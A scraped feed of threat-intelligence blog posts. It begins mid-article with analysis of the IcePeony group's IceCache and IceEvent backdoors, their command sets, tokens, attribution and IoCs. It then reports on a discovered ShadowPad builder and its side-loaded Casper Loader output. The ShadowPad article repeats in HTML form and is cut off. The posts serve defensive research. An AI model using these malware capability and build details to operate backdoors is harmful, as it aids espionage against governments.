/> <h3 id="icecache">IceCache</h3> IceCache is an ELF64 binary developed in Go language. It is customized based on the open-source software reGeorge. <img src="https://nao-sec.org/assets/2024-10-17/13.png" width="60%" /> To facilitate their intrusion operations, they added file transmission commands and command execution functionality. <img src="https://nao-sec.org/assets/2024-10-17/14.png" alt="" /> IceCache module is installed and run on IIS servers. The number of commands change, but they are classified into two types based on authentication tokens. We found files with remaining PDB information. These files were developed by a user named “power” in a project called “cachsess” <table> <thead> <tr> <th>PDB Path</th> </tr> </thead> <tbody> <tr> <td>C:\Users\power\documents\visual studio 2017\Projects\cachsess\x64\Release\cachsess.pdb</td> </tr> <tr> <td>C:\Users\power\Documents\Visual Studio 2017\Projects\cachsess\Release\cachsess32.pdb</td> </tr> </tbody> </table> The number of commands changes over time, but it includes command execution functions, SOCKS proxy functions, and file transmission functions. <table> <thead> <tr> <th>TYPE-A</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>EXEC / EXEC_PRO</td> <td>Command to the execution of a process</td> </tr> <tr> <td>SOCKS_HELLO</td> <td>Command to SOCKS protocol initial handshake message</td> </tr> <tr> <td>SOCKS_CONNECT</td> <td>Command to indicate a connection request with the SOCKS protocol</td> </tr> <tr> <td>SOCKS_DISCONNECT</td> <td>Command to indicate disconnection with SOCKS protocol</td> </tr> <tr> <td>SOCKS_READ</td> <td>Command to reading of data in SOCKS protocol</td> </tr> <tr> <td>SOCKS_FORWARD</td> <td>Command to instruct data transfer via SOCKS protocol</td> </tr> <tr> <td>PROXY_ADD</td> <td>Command to add a proxy</td> </tr> <tr> <td>PROXY_LIST</td> <td>Command to list a proxy</td> </tr> <tr> <td>PROXY_DEL</td> <td>Command to del a proxy</td> </tr> <tr> <td>PROXY_CLEAR</td> <td>Command to clear all proxy settings</td> </tr> <tr> <td>PROXY_SET_JS</td> <td>Set the JavaScript</td> </tr> <tr> <td>PROXY_GET_JS</td> <td>Get set the JavaScript</td> </tr> <tr> <td>PROXY_ALLOW_PC</td> <td>Allowed PC settings</td> </tr> <tr> <td>PROXY_CACHE_CLEAR</td> <td>Command to clear the proxy cache</td> </tr> <tr> <td>PROXY_CACHE_TIME</td> <td>Command to set proxy cache time</td> </tr> <tr> <td>FILE_UPLOAD</td> <td>Upload Files</td> </tr> <tr> <td>FILE_DOWNLOAD</td> <td>Download Files</td> </tr> </tbody> </table> <table> <thead> <tr> <th>TYPE-B</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>EXEC / EXEC_PRO</td> <td>Command that directs the execution of a process</td> </tr> <tr> <td>SOCKS_HELLO</td> <td>SOCKS protocol initial handshake message</td> </tr> <tr> <td>SOCKS_CONNECT</td> <td>Command to indicate a connection request with the SOCKS protocol</td> </tr> <tr> <td>SOCKS_DISCONNECT</td> <td>Command to indicate disconnection with SOCKS protocol</td> </tr> <tr> <td>SOCKS_READ</td> <td>Command that directs reading of data in SOCKS protocol</td> </tr> <tr> <td>SOCKS_FORWARD</td> <td>Command to instruct data transfer via SOCKS protocol</td> </tr> <tr> <td>PROXY_ADD</td> <td>Command to add a proxy</td> </tr> <tr> <td>PROXY_LIST</td> <td>Command to list a proxy</td> </tr> <tr> <td>PROXY_DEL</td> <td>Command to del a proxy</td> </tr> <tr> <td>PROXY_CLEAR</td> <td>Command to clear all proxy settings</td> </tr> <tr> <td>FILE_UPLOAD / FILE_UPLOAD_PRO</td> <td>Upload Files</td> </tr> <tr> <td>FILE_DOWNLOAD / FILE_DOWNLOAD_PRO</td> <td>Download Files</td> </tr> <tr> <td>IIS_VERSION</td> <td>Show IIS version</td> </tr> </tbody> </table> These are the IceCache modules found so far. The first sample we are aware of was compiled in August 2023 and submitted to VirusTotal in October. Since there is no discrepancy between the compille time and the first submission, we believe the dates are reliable. Many new samples have also been found since 2024. Most of the submitters are from India, which matches the victim information we have gathered from OpenDir data. The number of commands has change over time. It is show that the malware’s developers have made improvements while continuing their intrusion operations. <table> <thead> <tr> <th>sha256[:8]</th> <th>Compile Time</th> <th>First Submission</th> <th>Submitter</th> <th>Cmd Num</th> <th>X-Token</th> <th>TYPE</th> </tr> </thead> <tbody> <tr> <td>5b16d153</td> <td>2024-07-17 09:11:14</td> <td>2024-08-03 04:58:20</td> <td>c8d0b2b9 (ID)</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>484e2740</td> <td>2024-06-21 03:05:15</td> <td>2024-08-07 09:25:53</td> <td>39d4d6d2 - email</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>11e90e24</td> <td>2024-06-05 03:52:48</td> <td>2024-06-18 12:21:50</td> <td>d9cb313c (ID)</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>b8d030ed</td> <td>2024-06-05 03:52:41</td> <td>2024-06-18 10:47:18</td> <td>408f1927 (ID)</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>ceb47274</td> <td>2024-04-25 09:53:26</td> <td>2024-08-02 21:50:50</td> <td>06ac9f47 (BR)</td> <td>20</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>d1955169</td> <td>2024-04-21 11:29:25</td> <td>2024-06-18 12:24:39</td> <td>d9cb313c (ID)</td> <td>18</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>de8f58f0</td> <td>2024-04-21 11:29:10</td> <td>2024-06-18 10:49:53</td> <td>408f1927 (ID)</td> <td>18</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>53558af</td> <td>2024-03-27 05:08:50</td> <td>2024-04-19 07:57:19</td> <td>c2440bbf (ID)</td> <td>18</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>0b8b10a2</td> <td>2024-03-27 05:08:57</td> <td>2024-04-18 13:54:16</td> <td>c2440bbf (ID)</td> <td>18</td> <td>tn7rM2851XVvOFbc</td> <td>B</td> </tr> <tr> <td>a66627cc</td> <td>2024-02-20 09:36:12</td> <td>2024-03-12 15:17:55</td> <td>a6412166 (VN)</td> <td>16</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> <tr> <td>e5f520d9</td> <td>2024-02-01 09:32:21</td> <td>2024-07-17 09:30:54</td> <td>24761b38 (SG)</td> <td>24</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> <tr> <td>3eb56218</td> <td>2023-12-07 03:04:16</td> <td>2024-02-20 13:54:02</td> <td>0f09a1ae (ID)</td> <td>24</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> <tr> <td>5fd5e99f</td> <td>2023-09-27 00:50:46</td> <td>2024-03-24 08:59:02</td> <td>Ca43fb0f (ID)</td> <td>24</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> <tr> <td>0eb60e4c</td> <td>2023-08-23 09:11:24</td> <td>2023-10-18 10:11:00</td> <td>0e8f2a34 (VN)</td> <td>18</td> <td>cbFOvVX1582Mr7nt</td> <td>A</td> </tr> </tbody> </table> <h3 id="iceevent">IceEvent</h3> IceEvent is a simple passive-mode backdoor that installed as a service. <table> <thead> <tr> <th>PDB Path</th> </tr> </thead> <tbody> <tr> <td>C:\Users\power\Documents\Visual Studio 2017\Projects\WinService\x64\Release\WinService.pdb</td> </tr> </tbody> </table> Two types have been identified based on the command format. Both types only have the minimum necessary commands. The older type was discovered in September 2023, and several new types were found in April of this year. All of these were submitted from India. <table> <thead> <tr> <th>TYPE-A</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>FILE:</td> <td>Command to Reading files via sockets</td> </tr> <tr> <td>CMD:</td> <td>Command to the execution of a process</td> </tr> </tbody> </table> <table> <thead> <tr> <th>TYPE-B</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>UPFILE</td> <td>Upload Files</td> </tr> <tr> <td>DOWNFILE</td> <td>Download Files</td> </tr> <tr> <td>CMD</td> <td>Command to the execution of a process</td> </tr> </tbody> </table> <table> <thead> <tr> <th>sha256[:8]</th> <th>Compile Time</th> <th>First Submission</th> <th>Submitter</th> <th>Cmd Num</th> <th>TYPE</th> </tr> </thead> <tbody> <tr> <td>80e83118</td> <td>2024-04-25 09:50:58</td> <td>2024-07-25 05:43:08</td> <td>INDIA (99003aca)</td> <td>3</td> <td>B</td> </tr> <tr> <td>9aba997b</td> <td>2024-04-30 04:48:48</td> <td>2024-06-14 05:46:49</td> <td>INDIA (060734bd)</td> <td>3</td> <td>B</td> </tr> <tr> <td>9a0b0439</td> <td>2024-04-25 09:50:58</td> <td>2024-06-14 05:00:08</td> <td>INDIA (060734bd)</td> <td>3</td> <td>B</td> </tr> <tr> <td>bc94da1a</td> <td>2023-08-23 08:52:46</td> <td>2023-09-05 03:03:57</td> <td>INDIA (81f8b666)</td> <td>2</td> <td>A</td> </tr> </tbody> </table> <h3 id="similarities">Similarities</h3> We believe that IceEvent was developed because a simple passive backdoor was needed during intrusions, based on code similarities with IceCache. Both IceCache and IceEvent use the same key for XOR to encode communication data. And PDB information shows that the same developer created both malware. This is the XOR-based data encoding process used for communication data, which is equal to both malware. <img src="https://nao-sec.org/assets/2024-10-17/15.png" alt="" /> This is the command execution process equal to both malware. Since the function calls and branching processes are exactly the same, we believe they were compiled from the same source code. Other commands also match perfectly. <img src="https://nao-sec.org/assets/2024-10-17/16.png" alt="" /> The communication data of IceCache and IceEvent is only encoded using the XOR process mentioned earlier, making it easy to decode. Here is an example of decoding the data during command execution. <img src="https://nao-sec.org/assets/2024-10-17/17.png" alt="" /> <h2 id="attribution">Attribution</h2> We investigated the attacker’s activity times based on the timestamp information in the zsh_history file. As a result, we found that the attacker is likely operating in the UTC+8 time zone. Surprisingly, the attacker works from 8 a.m. to 10 p.m., which is a 14-hour workday. They are remarkably diligent workers. <img src="https://nao-sec.org/assets/2024-10-17/18.png" alt="" /> Similarly, we investigated the changes in activity based on the day of the week. It seems that the attackers work six days a week. While they are less active on Fridays and Saturdays, their only full day off appears to be Sunday. This investigation suggests that the attackers are not conducting these attacks as personal activities, but are instead engaging in them as part of organized, professional operations. <img src="https://nao-sec.org/assets/2024-10-17/19.png" alt="" /> By the way, have you heard of the term “996 working hour system”? This term originated in China’s IT industry. In China’s IT industry, long working hours see as a problem. It refers to working from 9 a.m. to 9 p.m.,six days a week. Such hard work conditions are called the “996 working hour system”. IcePeony might be working under the 996 working hour system. <img src="https://nao-sec.org/assets/2024-10-17/20.png" alt="" /> <a href="https://en.wikipedia.org/wiki/996_working_hour_system">https://en.wikipedia.org/wiki/996_working_hour_system</a> Next, There is a very simple example to consider when discussing attribution. IcePeony sometimes includes Simplified Chinese comments in the tools they use. Here, we provide an example of a wrapper script for the IceCache Client. From this, we can conclude that IcePeony is a threat actor from a region where Simplified Chinese is commonly used. <img src="https://nao-sec.org/assets/2024-10-17/21.png" alt="" /> IcePeony uses an original malware called IceCache. As previously mentioned, IceCache is based on reGeorge. More specifically, IceCache contains a string referring to a project named reGeorgGo. Upon investigating reGeorgGo, We found that it was developed by a Chinese security engineer. There is no other information about this project on the internet, aside from the developer’s blog. It was a not well-known tool. However, the publicly available reGeorgGo is a tool with only three arguments, where as IceCache has more commands added to it. <img src="https://nao-sec.org/assets/2024-10-17/22.png" alt="" /> <a href="https://github.com/zz1gg/secdemo/tree/main/proxy/reGeorgGo">https://github.com/zz1gg/secdemo/tree/main/proxy/reGeorgGo</a> Let’s examine attribution from another side. In this attack campaign, IcePeony targeted India, Mauritius, and Vietnam. While attacks on India and Vietnam are generally not uncommon. What about Mauritius? <img src="https://nao-sec.org/assets/2024-10-17/23.png" width="50%" /> Mauritius is a small country located in the Indian Ocean. Interestingly, Mauritius has recently formed a cooperation with India. They are wary of China’s expansion into the Indian Ocean and have begun various forms of collaboration to counter this influence. <img src="https://nao-sec.org/assets/2024-10-17/24.png" alt="" /> <a href="https://www.mea.gov.in/newsdetail1.htm?12042/">https://www.mea.gov.in/newsdetail1.htm?12042/</a> We summarize the attribution information using the Diamond Model. IcePeony consists of Simplified Chinese speakers who show interest in the governments of Indian Ocean countries and work under the 996 working hour system. They prefer open-source software developed in Chinese-speaking regions and use their original malware, IceCache and IceEvent. In attacks on the Indian government, they used VPSs located in the Indian region. Additionally, the governments and education sectors in Mauritius and Vietnam were also targeted. <img src="https://nao-sec.org/assets/2024-10-17/25.png" alt="" /> <h2 id="wrap-up">Wrap-Up</h2> In this blog post, we introduced IcePeony. IcePeony is a newly emerging attack group. Our investigation shows that they have been active since at least 2023. Their primary targets are countries in Asia, such as India and Vietnam. The log files we analyzed recorded attempts to attack over 200 different Indian government websites. IcePeony typically attempts SQL Injection attacks on publicly accessible web servers. If vulnerabilities are found, they install web shells or execute malware. Ultimately, they aim to steal credentials. We suspect that IcePeony operates as a group of individuals conducting cyberattacks in support of China’s national interests, possibly in connection with China’s maritime strategy. They remain active, and we must continue monitoring their activities closely moving forward. <h2 id="iocs">IoCs</h2> <h3 id="ip">IP</h3> <ul> <li>165[.]22.211.62</li> <li>64[.]227.133.248</li> <li>173[.]208.156.19</li> <li>173[.]208.156.144</li> <li>154[.]213.17.225</li> <li>103[.]150.186.219</li> <li>63[.]141.255.16</li> <li>204[.]12.205.10</li> <li>107[.]148.37.63</li> <li>103[.]99.60.119</li> <li>154[.]213.17.237</li> <li>45[.]195.205.88</li> <li>154[.]213.17.244</li> <li>103[.]99.60.93</li> <li>149[.]115.231.17</li> <li>149[.]115.231.39</li> <li>103[.]99.60.108</li> </ul> <h3 id="domain">Domain</h3> <ul> <li>d45qomwkl[.]online</li> <li>k9ccin[.]com</li> <li>k8ccyn[.]com</li> <li>88k8cc[.]com</li> <li>googlesvn[.]com</li> </ul> <h3 id="icecache-1">IceCache</h3> <ul> <li>484e274077ab6f9354bf71164a8edee4dc4672fcfbf05355958785824fe0468f</li> <li>5b16d1533754c9e625340c4fc2c1f76b11f37eb801166ccfb96d2aa02875a811</li> <li>ceb47274f4b6293df8904c917f423c2f07f1f31416b79f3b42b6d64e65dcfe1b</li> <li>e5f520d95cbad6ac38eb6badbe0ad225f133e0e410af4e6df5a36b06813e451b</li> <li>d1955169cd8195ecedfb85a3234e4e6b191f596e493904ebca5f44e176f3f950</li> <li>11e90e2458a97957064a3d3f508fa6dadae19f632b45ff9523b7def50ebacb63</li> <li>de8f58f008ddaa60b5cf1b729ca03f276d2267e0a80b584f2f0723e0fac9f76c</li> <li>b8d030ed55bfb6bc4fdc9fe34349ef502561519a79166344194052f165d69681</li> <li>535586af127e85c5561199a9a1a3254d554a6cb97200ee139c5ce23e68a932bd</li> <li>0b8b10a2ff68cb2aa3451eedac4a8af4bd147ef9ddc6eb84fc5b01a65fca68fd</li> <li>5fd5e99fc503831b71f4072a335f662d1188d7bc8ca2340706344fb974c7fe46</li> <li>3eb56218a80582a79f8f4959b8360ada1b5e471d723812423e9d68354b6e008c</li> <li>a66627cc13f827064b7fcea643ab31b34a7cea444d85acc4e146d9f2b2851cf6</li> <li>0eb60e4c5dc7b06b719e9dbd880eb5b7514272dc0d11e4760354f8bb44841f77</li> </ul> <h3 id="iceevent-1">IceEvent</h3> <ul> <li>80e831180237b819e14c36e4af70304bc66744d26726310e3c0dd95f1740ee58</li> <li>9a0b0439e6fd2403f764acf0527f2365a4b9a98e9643cd5d03ccccf3825a732e</li> <li>9aba997bbf2f38f68ad8cc3474ef68eedd0b99e8f7ce39045f1d770e2af24fea</li> <li>bc94da1a066cbb9bdee7a03145609d0f9202b426a52aca19cc8d145b4175603b</li> </ul>
Building Casper’s Shadow

Sun, 30 Jun 2024 15:00:00 -0000

Introduction A few days ago, we came across a peculiar file. It looked like some kind of builder, and a quick glance at the settings piqued our interest. It appeared to be a ShadowPad builder, probably created around 2021. ShadowPad builders became a topic of conversation around the time of the i-Soon leak, but we had never seen the actual builder ourselves. This is likely true for most of you as well. We were so intrigued that we carefully investigated this builder and reviewed past attack campaigns. In this article, we will share how attackers build ShadowPad, what we discovered through our investigation, and our insights. Our investigation is still ongoing. We would love to engage in active discussions with you. If you have any opinions or comments, please feel free to contact us. [Note] What we discovered this time is a builder. It does not include a controller. Therefore, it is not possible to control what is generated by this builder. In other words, this builder alone is not meaningful in the real world. Background In June 2024, we happened to read a research memo from a year ago. We often read past memos for a change of pace. In doing so, we recalled an attack on Kyrgyzstan in April 2023. https://x.com/nao_sec/status/1648960199938707456 This attack involved a file resembling a RoyalRoad RTF, which prompted our investigation at the time. Opening this RTF file with a vulnerable version of Microsoft Word displayed a decoy file related to Kyrgyzstan’s cybersecurity, while simultaneously writing and executing several files to the disk. As a result, a CobaltStrike beacon was executed. The loader that decrypted and executed the beacon resembled Casper Loader. Casper Loader is familiar to threat researchers specializing in East Asia and has been reported to be used in attacks by Tick12. Our friend @aRtAGGI conducted similar analyses at the time. https://x.com/aRtAGGI/status/1649184131090087938 We later found that a similar attack had been carried out against Kazakhstan after searching our past database. The attack on Kazakhstan was older than the one on Kyrgyzstan, occurring around November 2022. In this case, the same loader executed from the RTF file eventually ran the CobaltStrike beacon. Information about the RTF files used in the attacks on Kyrgyzstan and Kazakhstan is listed in the IoC sheet from our previous research on RoyalRoad RTF34. We have identified these as U-4. If you are interested, please refer to the IoC sheet. https://nao-sec.org/jsac2020_ioc.html Let’s return to the present. To investigate recent attack samples, we executed a search query based on the characteristics of the loader used in the attack on Kyrgyzstan. exports:IEE2 exports:LoadLibraryShim2 exports:LoadStringRC2 We found an unusual file posted in May 2024. This data was embedded in the resource section of another file. We downloaded and executed the original file. To our surprise, it was a ShadowPad builder. CasperVMakerHTTPx86 MD5 eb99580e0d90ee61b3e2e3bd8715c633 SHA-1 706482eda6d747ca2688cdfd97399f800da9e73c SHA-256 b6d7c456423c871c7ffe418069a75c39055e4e3d023021c8b0885a02c7ce93c6 When launching the ShadowPad builder, which calls itself CasperVMakerHTTPx86, the following screen appears. There are several tabs, each with various settings. First Install Inject Online Proxy DNS These items are very similar to the reported architecture of ShadowPad5. This suggests that these tabs are configuration items for each module. The settings for each item are as follows: Let’s try building ShadowPad. By clicking the “Build EXE x86” button, ShadowPad is generated. If the build is successful, an EXE file and a DLL file are created. The EXE file is a legitimate AppLaunch. It loads the mscoree.dll in the same directory via DLL Side-Loading. The DLL file is the Casper Loader, which decodes and executes the ShadowPad shellcode stored internally. Comparison with Similar Samples ShadowPad loaders exhibit several patterns, but those generated using this builder are decoded using a custom XOR with constants. There are many samples with similar characteristics, but we will introduce two of them. Sample-1 According to Macnica’s report2, Tick uses Casper Loader to execute ShadowPad. Comparing this Casper Loader with the loader created using the builder reveals that while the Macnica sample contains junk code and different fixed values, the algorithm is the same. Sample-2 A report released by the FBI in December 20216 reported an attack exploiting CVE-2021-44515 where ShadowPad was used. The AppLaunch.exe and mscoree.dll in this case used Casper Loader to execute ShadowPad. Comparing this Casper Loader with the one created using the builder shows that the algorithm and fixed values are identical. Although API Hashing is not used, it is a highly similar sample. ShadowPad Community As you know, ShadowPad is commercial software sold for profit. According to SentinelOne’s report from 20215, ShadowPad is sold to various targeted attack groups, and there is speculation that whg and Rose are involved in its development. The i-Soon leak in February 2024 reported that i-Soon was selling software that appeared to be ShadowPad (including source code and training)7. As various researchers have reported256891011121314151617181920212223242526272829303132333435363738, many targeted attack groups use ShadowPad. These can be broadly categorized into two groups: attack groups associated with the MSS, like APT41, and those associated with the PLA, like Tick. As previously mentioned, it is generally believed that whg and Rose were involved in ShadowPad’s development. There is no compelling reason to refute this, so we will proceed with this assumption. According to a U.S. government report related to APT4139, Rose (Tan Dailin) was involved in APT41. Seven individuals were indicted for their involvement with APT41, with Rose (and Zhang Haoran) being particularly noted for their involvement in both BARIUM and LEAD, making them key figures in APT41’s activities. This background suggests that BARIUM was the earliest adopter of ShadowPad, followed by LEAD. In contrast, the PLA has many more attack groups using ShadowPad than the MSS. This is generally because many researchers have given them different names, and their relationships are not sufficiently organized. If you are a researcher, you probably have more organized information in your mind (or within your organization). Of course, we understand and accept this. However, to keep things simple, we will exclude such discussions in this article and share how we organized this information within nao_sec. Interestingly, all these attack groups used the RoyalRoad RTF Weaponizer. Is this just a coincidence? ShadowPad and RoyalRoad RTF Weaponizer may be shared through the same channels. Conclusion In this article, we introduced the ShadowPad builder. ShadowPad, widely used by various targeted attack groups as a successor to PlugX, had limited information available about its builder until now. This article sheds light on how attackers build ShadowPad. We also organized the relationships between attack groups using ShadowPad. Our research is still ongoing. We would love to engage in active discussions. If you have any opinions or comments, please contact us. We look forward to hearing from you. Acknowledgments We received a lot of help from our friends in writing this article. While we won’t name individuals here, we are immensely grateful to the many supportive reviewers. We want to take this opportunity to express our deepest gratitude to you. References TrendMicro, “Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data”, https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf ↩ マクニカ, “標的型攻撃の実態と対策アプローチ第5版日本を狙うサイバーエスピオナージの動向 2020年度”, https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2020_5.pdf ↩ ↩2 ↩3 nao_sec, “An Overhead View of the Royal Road”, https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html ↩ nao_sec, “Royal Road! Re:Dive”, https://nao-sec.org/2021/01/royal-road-redive.html ↩ SentinelOne, “ShadowPad A Masterpiece of Privately Sold Malware in Chinese Espionage”, https://www.sentinelone.com/labs/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/ ↩ ↩2 ↩3 FBI, “APT Actors Exploiting Newly-Identified Zero Day in ManageEngine Desktop Central”, https://www.ic3.gov/Media/News/2021/211220.pdf ↩ ↩2 HarfangLab, “A comprehensive analysis of I-Soon’s commercial offering”, https://harfanglab.io/en/insidethelab/isoon-leak-analysis/ ↩ Kaspersky, “ShadowPad in corporate networks”, https://securelist.com/shadowpad-in-corporate-networks/81432/ ↩ Kaspersky, “Operation ShadowHammer”, https://securelist.com/operation-shadowhammer/89992/ ↩ ESET, “Connecting the dots: Exposing the arsenal and methods of the Winnti Group”, https://www.welivesecurity.com/2019/10/14/connecting-dots-exposing-arsenal-methods-winnti/ ↩ ESET, “Winnti Group targeting universities in Hong Kong”, https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/ ↩ マクニカ, “標的型攻撃の実態と対策アプローチ第4版日本を狙うサイバーエスピオナージの動向 2019年度下期”, https://www.macnica.co.jp/business/security/manufacturers/files/mpressioncss_ta_report_2019_4.pdf ↩ PwC, “Around the world in 80 days 4.2bn packets”, https://www.youtube.com/watch?v=YCwyc6SctYs ↩ CrowdStrike, “Manufacturing Industry in the Adversaries’ Crosshairs”, https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/ ↩ Kaspersky, “APT trends report Q2 2020”, https://securelist.com/apt-trends-report-q2-2020/97937/ ↩ Positive Technologies, “ShadowPad: new activity from the Winnti group”, https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf ↩ Symantec, “APT41: Indictments Put Chinese Espionage Group in the Spotlight”, https://symantec-enterprise-blogs.security.com/threat-intelligence/apt41-indictments-china-espionage ↩ Dr.Web, “Study of the ShadowPad APT backdoor and its relation to PlugX”, https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf ↩ TrendMicro, “Earth Akhlut: Exploring the Tools, Tactics, and Procedures of an Advanced Threat Actor Operating a Large Infrastructure”, https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf ↩ ESET, “Operation StealthyTrident: corporate software under attack”, https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/ ↩ Positive Technologies, “Higaisa or Winnti? APT41 backdoors, old and new”, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/ ↩ Recorded Future, “China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions”, https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf ↩ Recorded Future, “Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling”, https://www.recordedfuture.com/blog/chinese-group-tag-22-targets-nepal-philippines-taiwan ↩ TrendMicro, “Delving Deep: An Analysis of Earth Lusca’s Operations”, https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf ↩ Secureworks, “ShadowPad Malware Analysis”, https://www.secureworks.com/research/shadowpad-malware-analysis ↩ Recorded Future, “Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group”, https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf ↩ SentinelOne, “Moshen Dragon’s Triad-and-Error Approach Abusing Security Software to Sideload PlugX and ShadowPad”, https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/ ↩ TeamT5, “The Next Gen PlugX - ShadowPad - A Dive into the Emerging China-Nexus Modular Trojan, Pangolin8RAT”, https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf ↩ Positive Technologies, “Space Pirates: analyzing the tools and connections of a new hacker group”, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/ ↩ Kaspersky, “Attacks on industrial control systems using ShadowPad”, https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/ ↩ ESET, “Worok: The big picture”, https://www.welivesecurity.com/2022/09/06/worok-big-picture/ ↩ Elastic, “Update to the REF2924 intrusion set and related campaigns”, https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns ↩ Symantec, “Lancefly: Group Uses Custom Backdoor to Target Orgs in Government, Aviation, Other Sectors”, https://symantec-enterprise-blogs.security.com/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor ↩ TrendMicro, “Possible Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad”, https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html ↩ Recorded Future, “RedHotel: A Prolific, Chinese State-Sponsored Group Operating at a Global Scale”, https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf ↩ Symantec, “Redfly: Espionage Actors Continue to Target Critical Infrastructure”, https://symantec-enterprise-blogs.security.com/threat-intelligence/critical-infrastructure-attacks ↩ Palo Alto Networks, “Cyberespionage Attacks Against Southeast Asian Government Linked to Stately Taurus, Aka Mustang Panda”, https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/ ↩ TrendMicro, “Earth Krahang Exploits Intergovernmental Trust to Launch Cross-Government Attacks”, https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html ↩ United States Department of Justice, “Seven International Cyber Defendants, Including “Apt41” Actors, Charged In Connection With Computer Intrusion Campaigns Against More Than 100 Victims Globally”, https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer ↩

<img src="https://nao-sec.org/assets/2024-07-01/top.png" alt="" /> <h2 id="introduction">Introduction</h2> A few days ago, we came across a peculiar file. It looked like some kind of builder, and a quick glance at the settings piqued our interest. It appeared to be a ShadowPad builder, probably created around 2021. ShadowPad builders became a topic of conversation around the time of the i-Soon leak, but we had never seen the actual builder ourselves. This is likely true for most of you as well. We were so intrigued that we carefully investigated this builder and reviewed past attack campaigns. In this article, we will share how attackers build ShadowPad, what we discovered through our investigation, and our insights. Our investigation is still ongoing. We would love to engage in active discussions with you. If you have any opinions or comments, please feel free to contact us. [Note] What we discovered this time is a builder. It does not include a controller. Therefore, it is not possible to control what is generated by this builder. In other words, this builder alone is not meaningful in the real world. <h2 id="background">Background</h2> In June 2024, we happened to read a research memo from a year ago. We often read past memos for a change of pace. In doing so, we recalled an attack on Kyrgyzstan in April 2023. <img src="https://nao-sec.org/assets/2024-07-01/1.png" alt="" /> <a href="https://x.com/nao_sec/status/1648960199938707456">https://x.com/nao_sec/status/1648960199938707456</a> This attack involved a file resembling a RoyalRoad RTF, which prompted our investigation at the time. Opening this RTF file with a vulnerable version of Microsoft Word displayed a decoy file related to Kyrgyzstan’s cybersecurity, while simultaneously writing and executing several files to the disk. As a result, a CobaltStrike beacon was executed. <img src="https://nao-sec.org/assets/2024-07-01/2.png" alt="" /> The loader that decrypted and executed the beacon resembled Casper Loader. Casper Loader is familiar to threat researchers specializing in East Asia and has been reported to be used in attacks by Tick<a href="#fn:1" class="footnote" rel="footnote">1</a><a href="#fn:2" class="footnote" rel="footnote">2</a>. Our friend @aRtAGGI conducted similar analyses at the time. <img src="https://nao-sec.org/assets/2024-07-01/3.png" alt="" /> <a href="https://x.com/aRtAGGI/status/1649184131090087938">https://x.com/aRtAGGI/status/1649184131090087938</a> We later found that a similar attack had been carried out against Kazakhstan after searching our past database. The attack on Kazakhstan was older than the one on Kyrgyzstan, occurring around November 2022. In this case, the same loader executed from the RTF file eventually ran the CobaltStrike beacon. Information about the RTF files used in the attacks on Kyrgyzstan and Kazakhstan is listed in the IoC sheet from our previous research on RoyalRoad RTF<a href="#fn:3" class="footnote" rel="footnote">3</a><a href="#fn:4" class="footnote" rel="footnote">4</a>. We have identified these as <code class="language-plaintext highlighter-rouge">U-4</code>. If you are interested, please refer to the IoC sheet. <a href="https://nao-sec.org/jsac2020_ioc.html">https://nao-sec.org/jsac2020_ioc.html</a> Let’s return to the present. To investigate recent attack samples, we executed a search query based 